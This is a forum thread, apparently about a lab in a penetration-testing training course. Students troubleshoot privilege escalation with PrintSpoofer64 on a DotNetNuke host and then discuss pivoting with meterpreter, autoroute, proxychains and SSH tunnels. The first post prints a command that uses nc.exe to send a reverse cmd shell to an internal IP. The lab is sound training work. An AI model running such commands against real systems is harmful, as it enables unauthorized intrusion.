ATTACKING ENTERPRISE NETWORKS - Exploitation & Privilege Escalation

Dear all, I am asking for information about the first step of escalation with PrintSpoofer64. I did all the steps, but when I run this command:
c:\DotNetNuke\Portals\0\PrintSpoofer64.exe -c "c:\DotNetNuke\Portals\0\nc.exe 172.16.8.120 443 -e cmd"
I receive this error:
172.16.8.20[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
CreateProcessAsUser() failed. Error: 216

I solved it with HTB support.

Hey man, do you remember how you solved this issue?

I got a revshell in meterpreter and escalated with the “getsystem” command; it will execute what printspooler does with print spooler named pipes.

How did you get the meterpreter listener? If the payload executes on the DNN, and the only host in the same network is DMZ1, which doesn't have msfconsole, how did you do that? I have the SSH tunnel with proxychains, but this is a reverse connection. Not sure how I would make it work in both directions.

It was a long time ago that I fixed that, but to get a trace shell back you have to use autoroute and proxy chains; plus, there is a part in the pivoting module on how to use bind shells to achieve the same!

If you want to take it further, you can use tools like ligolo-ng to create full tunnels that will make your life easier, but that’s probably out of scope since they want you to use the MSF Console.

Yes, I’ve somehow managed to completely skip the part about Reverse Port Forwarding via SSH. I’ve made it work afterwards.

Thank you for the tip on ligolo-ng. Will check it out!

No problem, mate! As I said, it was a long time ago, so my memory is a bit thin, but that pivoting class is good stuff to know, especially if you start to do prolabs where you have to pivot.

Use the second alternative method (go below on the page). I don’t know why, but the 1st method doesn’t work on my session either.